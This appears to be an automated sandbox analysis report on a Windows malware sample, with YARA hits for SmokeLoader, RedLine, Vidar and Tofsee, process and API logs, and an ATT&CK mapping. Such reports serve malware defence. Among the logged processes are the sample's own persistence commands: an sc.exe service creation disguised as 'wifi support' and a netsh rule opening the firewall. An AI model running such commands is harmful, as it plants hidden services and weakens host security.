Source: 32.0.13E2.exe.c80000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Process created: C:\Users\user\Desktop\emPJndhuvA.exe "C:\Users\user\Desktop\emPJndhuvA.exe"
Source: C:\Users\user\AppData\Roaming\tiftjuh	Process created: C:\Users\user\AppData\Roaming\tiftjuh C:\Users\user\AppData\Roaming\tiftjuh
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 540
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Process created: C:\Users\user\AppData\Local\Temp\3D67.exe C:\Users\user\AppData\Local\Temp\3D67.exe
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bhlprady\
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\vodibdaj.exe" C:\Windows\SysWOW64\bhlprady\
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create bhlprady binPath= "C:\Windows\SysWOW64\bhlprady\vodibdaj.exe /d\"C:\Users\user\AppData\Local\Temp\952.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description bhlprady "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start bhlprady
Source: C:\Users\user\AppData\Local\Temp\952.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Process created: C:\Users\user\AppData\Local\Temp\13E2.exe C:\Users\user\AppData\Local\Temp\13E2.exe
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,

Source: explorer.exe, 00000003.00000000.292977118.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.283330440.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.286222807.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.278755550.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.266380862.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.300394001.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.261014750.0000000001640000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.362449734.0000000000C70000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.363899728.0000000000C70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.292977118.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.278755550.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.261014750.0000000001640000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.362449734.0000000000C70000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.363899728.0000000000C70000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.292977118.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.278755550.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.261014750.0000000001640000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.362449734.0000000000C70000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.363899728.0000000000C70000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000000.260833315.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.278535445.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.292744255.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000000.292977118.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.278755550.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.261014750.0000000001640000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.362449734.0000000000C70000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.363899728.0000000000C70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000000.292977118.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.278755550.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.261014750.0000000001640000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.362449734.0000000000C70000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.363899728.0000000000C70000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: __EH_prolog,OpenJobObjectA,GetLocaleInfoA,_ftell,_fseek,_printf,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\952.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\952.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\13E2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\bhlprady\vodibdaj.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_00408EC7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe

Code function: 29_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

Source: C:\Users\user\Desktop\emPJndhuvA.exe

Code function: 0_2_00401324 __EH_prolog,CompareFileTime,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExW,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExA,_printf,_malloc,_calloc,__wfopen_s,_fseek,__floor_pentium4,_puts,GetConsoleAliasA,GetModuleHandleA,GlobalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameW,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\AppData\Local\Temp\952.exe

Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Modifies the windows firewall

Show sources

Source: C:\Users\user\AppData\Local\Temp\952.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 00000010.00000002.620033146.000001383A16D000.00000004.00000001.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000010.00000002.620033146.000001383A16D000.00000004.00000001.sdmp	Binary or memory string: *@C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000011.00000002.585850469.0000021D16702000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000011.00000002.580722829.0000021D1663D000.00000004.00000001.sdmp	Binary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 32.2.13E2.exe.413f910.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.13E2.exe.413f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.447751764.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.439581609.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.440529688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.438204104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.438919609.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 1.1.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.tiftjuh.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.1.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.emPJndhuvA.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.3D67.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.310069625.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386280466.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386498287.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.295057363.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360645909.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309813053.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360518485.00000000004A0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Amadey bot

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 44.3.vodibdaj.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.952.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.580e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.412229320.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.383697292.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417710033.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417504443.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.543176167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.410807233.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417841182.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.415295647.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 952.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vodibdaj.exe PID: 6484, type: MEMORYSTR

Source: Yara match

File source: 0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 32.2.13E2.exe.413f910.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.13E2.exe.413f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.447751764.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.439581609.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.440529688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.438204104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.438919609.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 1.1.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.tiftjuh.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.1.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.emPJndhuvA.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.3D67.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.310069625.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386280466.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386498287.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.295057363.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360645909.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309813053.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360518485.00000000004A0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 0000001D.00000002.379514532.0000000000482000.00000004.00000020.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 44.3.vodibdaj.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.952.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.580e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.412229320.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.383697292.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417710033.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417504443.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.543176167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.410807233.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417841182.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.415295647.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 952.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vodibdaj.exe PID: 6484, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools311	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API54	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Windows Service4	Access Token Manipulation1	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution3	Logon Script (Mac)	Windows Service4	Software Packing33	NTDS	System Information Discovery237	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection713	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol35	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery671	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion11	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading231	Proc Filesystem	Virtualization/Sandbox Evasion341	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Valid Accounts1	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Virtualization/Sandbox Evasion341	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection713	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Hidden Files and Directories1	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
emPJndhuvA.exe	40%	Virustotal		Browse
emPJndhuvA.exe	66%	ReversingLabs	Win32.Trojan.Raccrypt
emPJndhuvA.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\13E2.exe	100%	Avira	HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\7E61.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FD2B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\13E2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2819.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\952.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6B74.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tiftjuh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5F8C.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\45F8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\vodibdaj.exe	100%	Joe Sandbox ML
